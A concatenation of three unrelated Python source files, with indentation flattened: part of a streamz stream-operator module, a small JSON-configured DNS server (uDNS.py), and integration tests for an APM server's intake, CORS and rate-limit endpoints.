metadata_result, self._metadata_buffer[key] = self._metadata_buffer[key], []
yield self._emit(tuple(result), list(metadata_result))
self._release_refs(metadata_result)
@gen.coroutine
def update(self, x, who=None, metadata=None):
self._retain_refs(metadata)
key = self._get_key(x)
buffer = self._buffer[key]
metadata_buffer = self._metadata_buffer[key]
buffer.append(x)
if isinstance(metadata, list):
metadata_buffer.extend(metadata)
else:
metadata_buffer.append(metadata)
if len(buffer) == self.n:
if self._timeout is not None and self.n > 1:
self._callbacks[key].cancel()
yield self._flush(key)
return
if len(buffer) == 1 and self._timeout is not None:
self._callbacks[key] = self.loop.call_later(
self._timeout, self._flush, key
)
@Stream.register_api()
class sliding_window(Stream):
""" Produce overlapping tuples of size n
Parameters
----------
return_partial : bool
If True, yield tuples as soon as any events come in, each tuple being
smaller or equal to the window size. If False, only start yielding
tuples once a full window has accrued.
Examples
--------
>>> source = Stream()
>>> source.sliding_window(3, return_partial=False).sink(print)
>>> for i in range(8):
... source.emit(i)
(0, 1, 2)
(1, 2, 3)
(2, 3, 4)
(3, 4, 5)
(4, 5, 6)
(5, 6, 7)
"""
_graphviz_shape = 'diamond'
def __init__(self, upstream, n, return_partial=True, **kwargs):
self.n = n
self._buffer = deque(maxlen=n)
self.metadata_buffer = deque(maxlen=n)
self.partial = return_partial
Stream.__init__(self, upstream, **kwargs)
def update(self, x, who=None, metadata=None):
self._retain_refs(metadata)
self._buffer.append(x)
if not isinstance(metadata, list):
metadata = [metadata]
self.metadata_buffer.append(metadata)
if self.partial or len(self._buffer) == self.n:
flat_metadata = [m for ml in self.metadata_buffer for m in ml]
ret = self._emit(tuple(self._buffer), flat_metadata)
if len(self.metadata_buffer) == self.n:
completed = self.metadata_buffer.popleft()
self._release_refs(completed)
return ret
else:
return []
def convert_interval(interval):
if isinstance(interval, str):
import pandas as pd
interval = pd.Timedelta(interval).total_seconds()
return interval
@Stream.register_api()
class timed_window(Stream):
""" Emit a tuple of collected results every interval
Every ``interval`` seconds this emits a tuple of all of the results
seen so far. This can help to batch data coming off of a high-volume
stream.
"""
_graphviz_shape = 'octagon'
def __init__(self, upstream, interval, **kwargs):
self.interval = convert_interval(interval)
self._buffer = []
self.metadata_buffer = []
self.last = gen.moment
Stream.__init__(self, upstream, ensure_io_loop=True, **kwargs)
self.loop.add_callback(self.cb)
def update(self, x, who=None, metadata=None):
self._buffer.append(x)
self._retain_refs(metadata)
self.metadata_buffer.append(metadata)
return self.last
@gen.coroutine
def cb(self):
while True:
L, self._buffer = self._buffer, []
metadata, self.metadata_buffer = self.metadata_buffer, []
m = [m for ml in metadata for m in ml]
self.last = self._emit(L, m)
self._release_refs(m)
yield self.last
yield gen.sleep(self.interval)
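# Usage sketch for ``timed_window`` (not a doctest, since the output depends
# on wall-clock timing): every ``interval`` seconds the buffered events flush
# downstream as one tuple.
#
# source = Stream()
# source.timed_window(0.5).sink(print)
# for i in range(3):
#     source.emit(i)
# # roughly every 0.5s the window flushes, e.g. printing (0, 1, 2)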
@Stream.register_api()
class delay(Stream):
""" Add a time delay to results """
_graphviz_shape = 'octagon'
def __init__(self, upstream, interval, **kwargs):
self.interval = convert_interval(interval)
self.queue = Queue()
Stream.__init__(self, upstream, ensure_io_loop=True, **kwargs)
self.loop.add_callback(self.cb)
@gen.coroutine
def cb(self):
while True:
last = time()
x, metadata = yield self.queue.get()
yield self._emit(x, metadata=metadata)
self._release_refs(metadata)
duration = self.interval - (time() - last)
if duration > 0:
yield gen.sleep(duration)
def update(self, x, who=None, metadata=None):
self._retain_refs(metadata)
return self.queue.put((x, metadata))
@Stream.register_api()
class rate_limit(Stream):
""" Limit the flow of data
This stops two elements from streaming through within an interval shorter
than the provided value.
Parameters
----------
interval: float
Time in seconds
"""
_graphviz_shape = 'octagon'
def __init__(self, upstream, interval, **kwargs):
self.interval = convert_interval(interval)
self.next = 0
Stream.__init__(self, upstream, ensure_io_loop=True, **kwargs)
@gen.coroutine
def update(self, x, who=None, metadata=None):
now = time()
old_next = self.next
self.next = max(now, self.next) + self.interval
if now < old_next:
yield gen.sleep(old_next - now)
yield self._emit(x, metadata=metadata)
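# Usage sketch for ``rate_limit``: with interval=1, five emits take roughly
# four seconds end to end, since each element after the first is held back
# until a full second has passed.
#
# source = Stream()
# source.rate_limit(1).sink(print)
# for i in range(5):
#     source.emit(i)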
@Stream.register_api()
class buffer(Stream):
""" Allow results to pile up at this point in the stream
This allows results to buffer in place at various points in the stream.
This can help to smooth flow through the system when backpressure is
applied.
"""
_graphviz_shape = 'diamond'
def __init__(self, upstream, n, **kwargs):
self.queue = Queue(maxsize=n)
Stream.__init__(self, upstream, ensure_io_loop=True, **kwargs)
self.loop.add_callback(self.cb)
def update(self, x, who=None, metadata=None):
self._retain_refs(metadata)
return self.queue.put((x, metadata))
@gen.coroutine
def cb(self):
while True:
x, metadata = yield self.queue.get()
yield self._emit(x, metadata=metadata)
self._release_refs(metadata)
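# Usage sketch for ``buffer``: decouple a fast producer from a slow consumer
# by letting up to n elements pile up at this node before backpressure applies.
#
# source = Stream()
# source.buffer(8).rate_limit(0.5).sink(print)
# for i in range(4):
#     source.emit(i)   # returns quickly; buffered elements drain at 2 per second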
@Stream.register_api()
class zip(Stream):
""" Combine streams together into a stream of tuples
We emit a new tuple once all upstream streams have produced a new element.
See also
--------
combine_latest
zip_latest
"""
_graphviz_orientation = 270
_graphviz_shape = 'triangle'
def __init__(self, *upstreams, **kwargs):
self.maxsize = kwargs.pop('maxsize', 10)
self.condition = Condition()
self.literals = [(i, val) for i, val in enumerate(upstreams)
if not isinstance(val, Stream)]
self.buffers = {upstream: deque()
for upstream in upstreams
if isinstance(upstream, Stream)}
upstreams2 = [upstream for upstream in upstreams if isinstance(upstream, Stream)]
Stream.__init__(self, upstreams=upstreams2, **kwargs)
def _add_upstream(self, upstream):
# Override method to handle setup of buffer for new stream
self.buffers[upstream] = deque()
super(zip, self)._add_upstream(upstream)
def _remove_upstream(self, upstream):
# Override method to handle removal of buffer for stream
self.buffers.pop(upstream)
super(zip, self)._remove_upstream(upstream)
def pack_literals(self, tup):
""" Fill buffers for literals whenever we empty them """
inp = list(tup)[::-1]
out = []
for i, val in self.literals:
while len(out) < i:
out.append(inp.pop())
out.append(val)
while inp:
out.append(inp.pop())
return tuple(out)
def update(self, x, who=None, metadata=None):
self._retain_refs(metadata)
L = self.buffers[who] # get buffer for stream
L.append((x, metadata))
if len(L) == 1 and all(self.buffers.values()):
vals = [self.buffers[up][0] for up in self.upstreams]
import builtins  # the builtin zip; plain ``zip`` is shadowed by this class
tup, md = builtins.zip(*vals)
for buf in self.buffers.values():
buf.popleft()
self.condition.notify_all()
if self.literals:
tup = self.pack_literals(tup)
md = [m for ml in md for m in ml]
ret = self._emit(tup, md)
self._release_refs(md)
return ret
elif len(L) > self.maxsize:
return self.condition.wait()
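# Usage sketch for ``zip``: emit a tuple only once every upstream has
# produced a fresh element.
#
# a = Stream()
# b = Stream()
# a.zip(b).sink(print)
# a.emit(1)      # nothing yet, still waiting on b
# b.emit('x')    # prints (1, 'x')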
@Stream.register_api()
class combine_latest(Stream):
""" Combine multiple streams together to a stream of tuples
This will emit a new tuple of all of the most recent elements seen from
any stream.
Parameters
----------
emit_on : stream or list of streams or None
only emit upon update of the streams listed.
If None, emit on update from any stream
See Also
--------
zip
"""
_graphviz_orientation = 270
_graphviz_shape = 'triangle'
def __init__(self, *upstreams, **kwargs):
emit_on = kwargs.pop('emit_on', None)
self._initial_emit_on = emit_on
self.last = [None for _ in upstreams]
self.metadata = [None for _ in upstreams]
self.missing = set(upstreams)
if emit_on is not None:
if not isinstance(emit_on, Iterable):
emit_on = (emit_on, )
emit_on = tuple(
upstreams[x] if isinstance(x, int) else x for x in emit_on)
self.emit_on = emit_on
else:
self.emit_on = upstreams
Stream.__init__(self, upstreams=upstreams, **kwargs)
def _add_upstream(self, upstream):
# Override method to handle setup of last and missing for new stream
self.last.append(None)
self.metadata.append(None)
self.missing.update([upstream])
super(combine_latest, self)._add_upstream(upstream)
if self._initial_emit_on is None:
self.emit_on = self.upstreams
def _remove_upstream(self, upstream):
# Override method to handle removal of last and missing for stream
if self.emit_on == (upstream,):
raise RuntimeError("Can't remove the ``emit_on`` stream since that "
"would cause no data to be emitted. "
"Consider adding an ``emit_on`` first by "
"running ``node.emit_on=(upstream,)`` to add "
"a new ``emit_on`` or running "
"``node.emit_on=tuple(node.upstreams)`` to "
"emit on all incoming data")
self.last.pop(self.upstreams.index(upstream))
self.metadata.pop(self.upstreams.index(upstream))
self.missing.remove(upstream)
super(combine_latest, self)._remove_upstream(upstream)
if self._initial_emit_on is None:
self.emit_on = self.upstreams
def update(self, x, who=None, metadata=None):
self._retain_refs(metadata)
idx = self.upstreams.index(who)
if self.metadata[idx]:
self._release_refs(self.metadata[idx])
self.metadata[idx] = metadata
if self.missing and who in self.missing:
self.missing.remove(who)
self.last[idx] = x
if not self.missing and who in self.emit_on:
tup = tuple(self.last)
md = [m for ml in self.metadata for m in ml]
return self._emit(tup, md)
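# Usage sketch for ``combine_latest`` with ``emit_on``: only updates on the
# first stream trigger an emission, paired with the latest value seen on the
# second stream.
#
# a = Stream()
# b = Stream()
# a.combine_latest(b, emit_on=a).sink(print)
# b.emit(10)     # nothing emitted, b is not in emit_on
# a.emit(1)      # prints (1, 10)
# b.emit(20)     # nothing emitted
# a.emit(2)      # prints (2, 20)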
@Stream.register_api()
class flatten(Stream):
""" Flatten streams of lists or iterables into a stream of elements
Examples
--------
>>> source = Stream()
>>> source.flatten().sink(print)
>>> for x in [[1, 2, 3], [4, 5], [6, 7, 7]]:
... source.emit(x)
1
2
3
4
5
6
7
See Also
--------
partition
"""
def update(self, x, who=None, metadata=None):
L = []
for i, item in enumerate(x):
if i == len(x) - 1:
y = self._emit(item, metadata=metadata)
else:
y = self._emit(item)
if type(y) is list:
L.extend(y)
else:
L.append(y)
return L
@Stream.register_api()
class unique(Stream):
""" Avoid sending through repeated elements
This deduplicates a stream so that only new elements pass through.
You can control how much of a history is stored with the ``maxsize=``
parameter. For example setting ``maxsize=1`` avoids sending through
elements when one is repeated right after the other.
Parameters
----------
maxsize: int or None, optional
number of stored unique values to check against
key : function, optional
Function which returns a representation of the incoming data.
For example ``key=lambda x: x['a']`` could be used to allow only
pieces of data with unique ``'a'`` values to pass through.
hashable : bool, optional
If True then data is assumed to be hashable, else it is not. This is
used for determining how to cache the history, if hashable then
either dicts or LRU caches are used, otherwise a deque is used.
Defaults to True.
Examples
--------
>>> source = Stream()
>>> source.unique(maxsize=1).sink(print)
>>> for x in [1, 1, 2, 2, 2, 1, 3]:
... source.emit(x)
1
2
1
3
"""
def __init__(self, upstream, maxsize=None, key=identity, hashable=True,
**kwargs):
self.key = key
self.maxsize = maxsize
if hashable:
self.seen = dict()
if self.maxsize:
from zict import LRU
self.seen = LRU(self.maxsize, self.seen)
else:
self.seen = []
Stream.__init__(self, upstream, **kwargs)
def update(self, x, who=None, metadata=None):
y = self.key(x)
emit = True
if isinstance(self.seen, list):
if y in self.seen:
self.seen.remove(y)
emit = False
self.seen.insert(0, y)
if self.maxsize:
del self.seen[self.maxsize:]
if emit:
return self._emit(x, metadata=metadata)
else:
if self.seen.get(y, '~~not_seen~~') == '~~not_seen~~':
self.seen[y] = 1
return self._emit(x, metadata=metadata)
@Stream.register_api()
class union(Stream):
""" Combine multiple streams into one
Every element from any of the upstreams streams will immediately flow
into the output stream. They will not be combined with elements from
other streams.
See also
--------
Stream.zip
Stream.combine_latest
"""
def __init__(self, *upstreams, **kwargs):
super(union, self).__init__(upstreams=upstreams, **kwargs)
def update(self, x, who=None, metadata=None):
return self._emit(x, metadata=metadata)
@Stream.register_api()
class pluck(Stream):
""" Select elements from elements in the stream.
Parameters
----------
pluck : object, list
The element(s) to pick from the incoming element in the stream
If an instance of list, will pick multiple elements.
Examples
--------
>>> source = Stream()
>>> source.pluck([0, 3]).sink(print)
>>> for x in [[1, 2, 3, 4], [4, 5, 6, 7], [8, 9, 10, 11]]:
... source.emit(x)
(1, 4)
(4, 7)
(8, 11)
>>> source = Stream()
>>> source.pluck('name').sink(print)
>>> for x in [{'name': 'Alice', 'x': 123}, {'name': 'Bob', 'x': 456}]:
... source.emit(x)
'Alice'
'Bob'
"""
def __init__(self, upstream, pick, **kwargs):
self.pick = pick
super(pluck, self).__init__(upstream, **kwargs)
def update(self, x, who=None, metadata=None):
if isinstance(self.pick, list):
return self._emit(tuple([x[ind] for ind in self.pick]),
metadata=metadata)
else:
return self._emit(x[self.pick], metadata=metadata)
@Stream.register_api()
class collect(Stream):
"""
Hold elements in a cache and emit them as a collection when flushed.
Examples
--------
>>> source1 = Stream()
>>> source2 = Stream()
>>> collector = collect(source1)
>>> collector.sink(print)
>>> source2.sink(collector.flush)
>>> source1.emit(1)
>>> source1.emit(2)
>>> source2.emit('anything') # flushes collector
...
[1, 2]
"""
def __init__(self, upstream, cache=None, metadata_cache=None, **kwargs):
if cache is None:
cache = deque()
self.cache = cache
if metadata_cache is None:
metadata_cache = deque()
self.metadata_cache = metadata_cache
Stream.__init__(self, upstream, **kwargs)
def update(self, x, who=None, metadata=None):
self._retain_refs(metadata)
self.cache.append(x)
if metadata:
if isinstance(metadata, list):
self.metadata_cache.extend(metadata)
else:
self.metadata_cache.append(metadata)
def flush(self, _=None):
out = tuple(self.cache)
metadata = list(self.metadata_cache)
self._emit(out, metadata)
self._release_refs(metadata)
self.cache.clear()
self.metadata_cache.clear()
@Stream.register_api()
class zip_latest(Stream):
"""Combine multiple streams together to a stream of tuples
The stream which this is called from is lossless: all elements from
the lossless stream are emitted regardless of when they arrive.
This will emit a new tuple consisting of an element from the lossless
stream paired with the latest elements from the other streams.
Elements are only emitted when an element on the lossless stream is
received, similar to ``combine_latest`` with the ``emit_on`` flag.
See Also
--------
Stream.combine_latest
Stream.zip
"""
def __init__(self, lossless, *upstreams, **kwargs):
upstreams = (lossless,) + upstreams
self.last = [None for _ in upstreams]
self.metadata = [None for _ in upstreams]
self.missing = set(upstreams)
self.lossless = lossless
self.lossless_buffer = deque()
Stream.__init__(self, upstreams=upstreams, **kwargs)
def update(self, x, who=None, metadata=None):
self._retain_refs(metadata)
idx = self.upstreams.index(who)
if who is self.lossless:
self.lossless_buffer.append((x, metadata))
elif self.metadata[idx]:
self._release_refs(self.metadata[idx])
self.metadata[idx] = metadata
self.last[idx] = x
if self.missing and who in self.missing:
self.missing.remove(who)
if not self.missing:
L = []
while self.lossless_buffer:
self.last[0], self.metadata[0] = self.lossless_buffer.popleft()
md = [m for ml in self.metadata for m in ml]
L.append(self._emit(tuple(self.last), md))
self._release_refs(self.metadata[0])
return L
@Stream.register_api()
class latest(Stream):
""" Drop held-up data and emit the latest result
This allows you to skip intermediate elements in the stream if there is
some back pressure causing a slowdown. Use this when you only care about
the latest elements, and are willing to lose older data.
This passes through values without modification otherwise.
Examples
--------
>>> source.map(f).latest().map(g) # doctest: +SKIP
"""
_graphviz_shape = 'octagon'
def __init__(self, upstream, **kwargs):
self.condition = Condition()
self.next = []
self.next_metadata = None
Stream.__init__(self, upstream, ensure_io_loop=True, **kwargs)
self.loop.add_callback(self.cb)
def update(self, x, who=None, metadata=None):
if self.next_metadata:
self._release_refs(self.next_metadata)
self._retain_refs(metadata)
self.next = [x]
self.next_metadata = metadata
self.loop.add_callback(self.condition.notify)
@gen.coroutine
def cb(self):
while True:
yield self.condition.wait()
[x] = self.next
yield self._emit(x, self.next_metadata)
@Stream.register_api()
class to_kafka(Stream):
""" Writes data in the stream to Kafka
This stream accepts a string or bytes object. Call ``flush`` to ensure all
messages are pushed. Responses from Kafka are pushed downstream.
Parameters
----------
topic : string
The topic to write to
producer_config : dict
Settings to set up the stream, see
https://docs.confluent.io/current/clients/confluent-kafka-python/#configuration
https://github.com/edenhill/librdkafka/blob/master/CONFIGURATION.md
Examples:
bootstrap.servers: Connection string (host:port) to Kafka
Examples
--------
>>> from streamz import Stream
>>> ARGS = {'bootstrap.servers': 'localhost:9092'}
>>> source = Stream()
>>> kafka = source.map(lambda x: str(x)).to_kafka('test', ARGS)
<to_kafka>
>>> for i in range(10):
... source.emit(i)
>>> kafka.flush()
"""
def __init__(self, upstream, topic, producer_config, **kwargs):
import confluent_kafka as ck
self.topic = topic
self.producer = ck.Producer(producer_config)
Stream.__init__(self, upstream, ensure_io_loop=True, **kwargs)
self.stopped = False
self.polltime = 0.2
self.loop.add_callback(self.poll)
self.futures = []
@gen.coroutine
def poll(self):
while not self.stopped:
# executes callbacks for any delivered data, in this thread
# if no messages were sent, nothing happens
self.producer.poll(0)
yield gen.sleep(self.polltime)
def update(self, x, who=None, metadata=None):
future = gen.Future()
self.futures.append(future)
@gen.coroutine
def _():
while True:
try:
# this runs asynchronously, in C-K's thread
self.producer.produce(self.topic, x, callback=self.cb)
return
except BufferError:
yield gen.sleep(self.polltime)
except Exception as e:
future.set_exception(e)
return
self.loop.add_callback(_)
return future
@gen.coroutine
def cb(self, err, msg):
future = self.futures.pop(0)
if msg is not None and msg.value() is not None:
future.set_result(None)
yield self._emit(msg.value())
else:
future.set_exception(err or msg.error())
def flush(self, timeout=-1):
self.producer.flush(timeout)
def sync(loop, func, *args, **kwargs):
"""
Run coroutine in loop running in separate thread.
"""
# This was taken from distributed/utils.py
# Tornado's PollIOLoop doesn't raise when used after being closed, so check ourselves
if PollIOLoop and ((isinstance(loop, PollIOLoop) and getattr(loop, '_closing', False))
or (hasattr(loop, 'asyncio_loop') and loop.asyncio_loop._closed)):
raise RuntimeError("IOLoop is closed")
timeout = kwargs.pop('callback_timeout', None)
e = threading.Event()
main_tid = get_thread_identity()
result = [None]
error = [False]
@gen.coroutine
def f():
try:
if main_tid == get_thread_identity():
raise RuntimeError("sync() called from thread of running loop")
yield gen.moment
thread_state.asynchronous = True
future = func(*args, **kwargs)
if timeout is not None:
future = gen.with_timeout(timedelta(seconds=timeout), future)
result[0] = yield future
except Exception:
error[0] = sys.exc_info()
finally:
thread_state.asynchronous = False
e.set()
loop.add_callback(f)
if timeout is not None:
if not e.wait(timeout):
raise gen.TimeoutError("timed out after %s s." % (timeout,))
else:
while not e.is_set():
e.wait(10)
if error[0]:
six.reraise(*error[0])
else:
return result[0]
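# A minimal sketch of driving ``sync`` by hand, assuming a Tornado IOLoop
# already running in a daemon thread (this mirrors how Stream.emit uses it):
#
# from threading import Thread
# from tornado.ioloop import IOLoop
#
# loop = IOLoop()
# Thread(target=loop.start, daemon=True).start()
#
# @gen.coroutine
# def coro(x):
#     yield gen.sleep(0.1)
#     raise gen.Return(x + 1)
#
# assert sync(loop, coro, 41) == 42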
|
uDNS.py
|
# coding=utf-8
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import datetime
import sys
import time
import threading
import traceback
import socketserver
import argparse
import codecs
import json
from dnslib import *
TTL = 60 * 5 # completely arbitrary TTL value
round_robin = False
default_records = list()
records = dict()
class DomainName(str):
def __getattr__(self, item):
return DomainName(item + '.' + self)
class BaseRequestHandler(socketserver.BaseRequestHandler):
def get_data(self):
raise NotImplementedError
def send_data(self, data):
raise NotImplementedError
def handle(self):
now = datetime.datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S.%f')
print("\n\n%s request %s (%s %s):" % (self.__class__.__name__[:3], now, self.client_address[0],
self.client_address[1]))
try:
data = self.get_data()
self.send_data(dns_response(data))
except Exception:
traceback.print_exc(file=sys.stderr)
class TCPRequestHandler(BaseRequestHandler):
def get_data(self):
data = self.request.recv(8192).strip()
sz = int(codecs.encode(data[:2], 'hex'), 16)
if sz < len(data) - 2:
raise Exception("TCP packet has extra data beyond its declared size")
elif sz > len(data) - 2:
raise Exception("TCP packet is shorter than its declared size")
return data[2:]
def send_data(self, data):
sz = codecs.decode(hex(len(data))[2:].zfill(4), 'hex')
return self.request.sendall(sz + data)
class UDPRequestHandler(BaseRequestHandler):
def get_data(self):
return self.request[0].strip()
def send_data(self, data):
return self.request[1].sendto(data, self.client_address)
def build_domain_mappings(path):
with open(path) as f:
zone_file = json.load(f)
for domain in zone_file['mappings']:
for d in iter(domain.keys()):
# this loop only runs once, kind of a hack to access the only key in the dict
domain_name = DomainName(d)
print("Domain name:", domain_name)
records[domain_name] = [A(x) for x in domain[domain_name]]
print(records[domain_name])
if 'otherwise' in zone_file:
default_records.extend([A(d) for d in zone_file['otherwise']])
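# A sketch of the zone-file layout build_domain_mappings expects; the key
# names come from the code above, the addresses are placeholders:
#
# {
#     "mappings": [
#         {"example.com": ["10.0.0.1", "10.0.0.2"]},
#         {"service.example.com": ["10.0.0.3"]}
#     ],
#     "otherwise": ["192.0.2.1"]
# }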
def add_authoritative_records(reply, domain):
# ns1 and ns2 are hardcoded in; change if necessary
reply.add_auth(RR(rname=domain, rtype=QTYPE.NS, rclass=1, ttl=TTL, rdata=NS(domain.ns1)))
reply.add_auth(RR(rname=domain, rtype=QTYPE.NS, rclass=1, ttl=TTL, rdata=NS(domain.ns2)))
def dns_response(data):
''' dns_response takes the raw bytes from the socket and implements all the
logic deciding which RRs are returned in the response '''
global default_records, records, TTL, round_robin
request = DNSRecord.parse(data)
print(request)
reply = DNSRecord(DNSHeader(id=request.header.id, qr=1, aa=1, ra=1), q=request.q)
qname = request.q.qname
qn = str(qname)
qtype = request.q.qtype
qt = QTYPE[qtype]
found_specific = False
# first look for a specific mapping
for domain, rrs in records.items():
if domain == qn or qn.endswith('.' + domain):
# we are the authoritative name server for this domain and all subdomains
for rdata in rrs:
# only include requested record types (i.e. A, MX, etc.)
rqt = rdata.__class__.__name__
if qt in ['*', rqt]:
found_specific = True
reply.add_answer(RR(rname=qname, rtype=getattr(QTYPE, str(rqt)), rclass=1, ttl=TTL, rdata=rdata))
# rotate the A entries if round robin is on
if round_robin:
a_records = [x for x in rrs if type(x) == A]
records[domain] = a_records[1:] + a_records[:1] # rotate list
break
# else if a specific mapping is not found, return default A-records
if not found_specific:
for a in default_records:
found_specific = True
reply.add_answer(RR(rname=qname, rtype=QTYPE.A, rclass=1, ttl=TTL, rdata=a))
if round_robin:
default_records = default_records[1:] + default_records[:1]
if not found_specific:
reply.header.set_rcode(3)
print("---- Reply: ----\n", reply)
return reply.pack()
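# A quick way to exercise dns_response without opening sockets, using
# dnslib's question helper (a sketch; assumes a zone file was loaded first
# via build_domain_mappings):
#
# query = DNSRecord.question("example.com", qtype="A")
# raw_reply = dns_response(query.pack())
# print(DNSRecord.parse(raw_reply))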
if __name__ == '__main__':
# handle cmd line args
parser = argparse.ArgumentParser()
parser.add_argument("ip_addr", type=str, help="Interface", default="127.0.0.1")
parser.add_argument("port", type=int, help="port uDNS should listen on")
parser.add_argument("zone_file", help="path to zone file")
parser.add_argument("--rr", action='store_true',
help='round robin load balances if multiple IP addresses are present for 1 domain')
args = parser.parse_args()
if args.rr:
round_robin = True
build_domain_mappings(args.zone_file)
servers = [
socketserver.ThreadingUDPServer((args.ip_addr, args.port), UDPRequestHandler),
socketserver.ThreadingTCPServer((args.ip_addr, args.port), TCPRequestHandler),
]
print("Starting DNS...")
for s in servers:
thread = threading.Thread(target=s.serve_forever) # that thread will start one more thread for each request
thread.daemon = True # exit the server thread when the main thread terminates
thread.start()
try:
while 1:
time.sleep(1)
sys.stderr.flush()
sys.stdout.flush()
except KeyboardInterrupt:
pass
finally:
for s in servers:
s.shutdown()
|
test_requests.py
|
from collections import defaultdict
import gzip
import requests
import threading
import time
import zlib
from io import BytesIO
from apmserver import ServerBaseTest, ClientSideBaseTest, CorsBaseTest
class Test(ServerBaseTest):
def test_ok(self):
r = self.request_intake()
assert r.status_code == 202, r.status_code
assert r.text == "", r.text
def test_ok_verbose(self):
r = self.request_intake(url='http://localhost:8200/intake/v2/events?verbose')
assert r.status_code == 202, r.status_code
assert r.json() == {"accepted": 4}, r.json()
def test_empty(self):
r = self.request_intake(data={})
assert r.status_code == 400, r.status_code
def test_not_existent(self):
r = self.request_intake(url='http://localhost:8200/transactionX')
assert r.status_code == 404, r.status_code
def test_method_not_allowed(self):
r = requests.get(self.intake_url)
assert r.status_code == 400, r.status_code
def test_bad_json(self):
r = self.request_intake(data="invalid content")
assert r.status_code == 400, r.status_code
def test_validation_fail(self):
data = self.get_event_payload(name="invalid-event.ndjson")
r = self.request_intake(data=data)
assert r.status_code == 400, r.status_code
assert "error validating JSON document against schema" in r.text, r.text
def test_rum_default_disabled(self):
r = self.request_intake(url='http://localhost:8200/intake/v2/rum/events')
assert r.status_code == 403, r.status_code
def test_healthcheck(self):
healthcheck_url = 'http://localhost:8200/'
r = requests.get(healthcheck_url)
assert r.status_code == 200, r.status_code
def test_gzip(self):
events = self.get_event_payload().encode("utf-8")
out = BytesIO()
with gzip.GzipFile(fileobj=out, mode="w") as f:
f.write(events)
r = requests.post(self.intake_url, data=out.getvalue(),
headers={'Content-Encoding': 'gzip', 'Content-Type': 'application/x-ndjson'})
assert r.status_code == 202, r.status_code
def test_deflate(self):
events = self.get_event_payload().encode("utf-8")
compressed_data = zlib.compress(events)
r = requests.post(self.intake_url, data=compressed_data,
headers={'Content-Encoding': 'deflate', 'Content-Type': 'application/x-ndjson'})
assert r.status_code == 202, r.status_code
def test_gzip_error(self):
events = self.get_event_payload()
r = requests.post(self.intake_url, json=events,
headers={'Content-Encoding': 'gzip', 'Content-Type': 'application/x-ndjson'})
assert r.status_code == 400, r.status_code
def test_deflate_error(self):
events = self.get_event_payload()
r = requests.post(self.intake_url, data=events,
headers={'Content-Encoding': 'deflate', 'Content-Type': 'application/x-ndjson'})
assert r.status_code == 400, r.status_code
def test_expvar_default(self):
"""expvar should not be exposed by default"""
r = requests.get(self.expvar_url)
assert r.status_code == 404, r.status_code
class ClientSideTest(ClientSideBaseTest):
def test_ok(self):
r = self.request_intake()
assert r.status_code == 202, r.status_code
def test_sourcemap_upload_fail(self):
path = self._beat_path_join(
'testdata',
'sourcemap',
'bundle.js.map')
with open(path) as file:
    r = requests.post(self.sourcemap_url,
                      files={'sourcemap': file})
assert r.status_code == 400, r.status_code
class CorsTest(CorsBaseTest):
def test_ok(self):
r = self.request_intake(headers={'Origin': 'http://www.elastic.co', 'content-type': 'application/x-ndjson'})
assert r.headers['Access-Control-Allow-Origin'] == 'http://www.elastic.co', r.headers
assert r.status_code == 202, r.status_code
def test_bad_origin(self):
# origin must include protocol and match exactly the allowed origin
r = self.request_intake(headers={'Origin': 'www.elastic.co', 'content-type': 'application/x-ndjson'})
assert r.status_code == 403, r.status_code
def test_no_origin(self):
r = self.request_intake()
assert r.status_code == 403, r.status_code
def test_preflight(self):
r = requests.options(self.intake_url,
data=self.get_event_payload(),
headers={'Origin': 'http://www.elastic.co',
'Access-Control-Request-Method': 'POST',
'Access-Control-Request-Headers': 'Content-Type, Content-Encoding'})
assert r.status_code == 200, r.status_code
assert r.headers['Access-Control-Allow-Origin'] == 'http://www.elastic.co', r.headers
assert r.headers['Access-Control-Allow-Headers'] == 'Content-Type, Content-Encoding, Accept', r.headers
assert r.headers['Access-Control-Allow-Methods'] == 'POST, OPTIONS', r.headers
assert r.headers['Vary'] == 'Origin', r.headers
assert r.headers['Content-Length'] == '0', r.headers
assert r.headers['Access-Control-Max-Age'] == '3600', r.headers
def test_preflight_bad_headers(self):
for h in [{'Access-Control-Request-Method': 'POST'}, {'Origin': 'www.elastic.co'}]:
r = requests.options(self.intake_url,
json=self.get_event_payload(),
headers=h)
assert r.status_code == 200, r.status_code
assert 'Access-Control-Allow-Origin' not in r.headers.keys(), r.headers
assert r.headers['Access-Control-Allow-Headers'] == 'Content-Type, Content-Encoding, Accept', r.headers
assert r.headers['Access-Control-Allow-Methods'] == 'POST, OPTIONS', r.headers
class RateLimitTest(ClientSideBaseTest):
def fire_events(self, data_file, iterations, split_ips=False):
events = self.get_event_payload(name=data_file)
threads = []
codes = defaultdict(int)
def fire(x):
ip = '10.11.12.13'
if split_ips and x % 2:
ip = '10.11.12.14'
r = self.request_intake(data=events,
headers={'content-type': 'application/x-ndjson', 'X-Forwarded-For': ip})
codes[r.status_code] += 1
return r.status_code
# rate limit hit, because every event in request is counted
for x in range(iterations):
threads.append(threading.Thread(target=fire, args=(x,)))
for t in threads:
t.start()
time.sleep(0.01)
for t in threads:
t.join()
return codes
# limit: 16, burst_multiplier: 3, burst: 48
def test_rate_limit(self):
# all requests from the same ip
# 19 events, batch size 10 => 20+1 events per request
codes = self.fire_events("ratelimit.ndjson", 3)
assert set(codes.keys()) == set([202]), codes
def test_rate_limit_hit(self):
# all requests from the same ip
codes = self.fire_events("ratelimit.ndjson", 5)
assert set(codes.keys()) == set([202, 429]), codes
assert codes[429] == 2, codes
assert codes[202] == 3, codes
def test_rate_limit_small_hit(self):
# all requests from the same ip
# 4 events, batch size 10 => 10+1 events per request
codes = self.fire_events("events.ndjson", 8)
assert set(codes.keys()) == set([202, 429]), codes
assert codes[429] == 3, codes
assert codes[202] == 5, codes
def test_rate_limit_only_metadata(self):
# all requests from the same ip
# no events, batch size 10 => 10+1 events per request
codes = self.fire_events("only-metadata.ndjson", 8)
assert set(codes.keys()) == set([202, 429]), codes
assert codes[429] == 3, codes
assert codes[202] == 5, codes
def test_multiple_ips_rate_limit(self):
# requests from 2 different ips
codes = self.fire_events("ratelimit.ndjson", 6, True)
assert set(codes.keys()) == set([202]), codes
def test_multiple_ips_rate_limit_hit(self):
# requests from 2 different ips
codes = self.fire_events("ratelimit.ndjson", 10, True)
assert set(codes.keys()) == set([202, 429]), codes
